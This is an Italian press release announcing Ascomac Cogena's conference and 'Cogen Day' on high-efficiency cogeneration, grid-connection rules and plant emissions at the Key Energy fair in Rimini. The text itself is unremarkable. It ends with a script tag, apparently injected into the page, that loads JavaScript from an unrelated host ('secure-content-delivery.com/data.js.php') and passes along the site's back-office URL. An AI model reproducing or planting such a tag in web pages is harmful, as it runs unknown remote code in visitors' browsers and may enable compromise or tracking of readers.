Presso la fiera Key Energy di Rimini, Ascomac Cogena intende proporre due iniziative per affrontare il tema della Decarbonizzazione, della Indipendenza energetica e del Risparmio energetico.
L’Italia può e deve fare molto di più da subito per la Decarbonizzazione, l’Indipendenza energetica, il Risparmio energetico, l’Ambiente, investendo concretamente nella Cogenerazione ad alto rendimento: tecnologia di generazione di energia ad alta efficienza, policombustibile che, utilizzando sia le FER che i prodotti energetici di origine fossile, ne riduce i consumi in maniera molto efficiente, integra tra di loro altre tecnologie che utilizzano fonti rinnovabili, programmandone di diritto e di fatto la produzione non programmabile.
La prima iniziativa, prevista per giovedì 7 novembre a partire dalle ore 14,30 presso la Sala Energia pad. B5, è costituita dal Convegno “Indipendenza Energetica e Decarbonizzazione – Il ruolo della Cogenerazione nel raggiungimento degli obiettivi 2020 per l’Italia, opportunità ed ostacoli”.
Obiettivi dell’incontro sono quelli di presentare le notevoli potenzialità di questa tecnologia e le conseguenti opportunità per il Paese nei più diversi settori di applicazione (industriale, residenziale, abitativo, agricolo, trasporti) in termini di risparmio sia economico che energetico ed ambientale e di analizzare il quadro normativo attuale attraverso concrete proposte di miglioramento.
A conclusione del Convegno, sarà presentato il Manifesto ASCOMAC Cogena: “Le COGENERAZIONI verso le Decarbonizzazione”.
IL COGEN DAY previsto venerdì 8 novembre presso la Sala Workshop CIB-COGENA alla luce di quanto esaminato nel Convegno, approfondirà, con due Focus tecnici, temi di grande attualità:
1. Il Grid Code: la normativa italiana e lo scenario europeo
Il Codice di rete è fondamentale per il funzionamento del sistema elettrico, in un mercato dell'energia “liberalizzato”. Il Focus si pone l’obiettivo di fare il punto sulla normativa tecnica di connessione alla rete elettrica di unità/impianti di generazione distribuita di energia da fonti rinnovabili e da cogenerazione ad alto rendimento quali le norme Norme CEI 0-16 e CEI 0-21, per dare agli Operatori del settore risposte operative.
2. Le emissioni degli impianti di cogenerazione
Gli impianti di cogenerazione sono ormai diffusi nei diversi bacini industriali, agricoli, del terziario del nostro Paese: il problema del trattamento delle loro emissioni in atmosfera e non solo, è diventato un argomento all’ordine del giorno, specialmente in alcune Regioni dove sono vigenti limiti molto restrittivi. Obiettivo del Focus è quello di fare chiarezza in funzione delle esigenze di legalità, trasparenza, certezza del diritto, uniformità delle regole, libertà di impresa, risparmio energetico, tutela dell’ambiente. Ascomac Cogena presenterà, inoltre, il Documento Position Paper del Coordinamento della Cogenerazione, promosso e costituito insieme con CIB e Italcogen.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.3011313669862834" type="text/javascript"></script>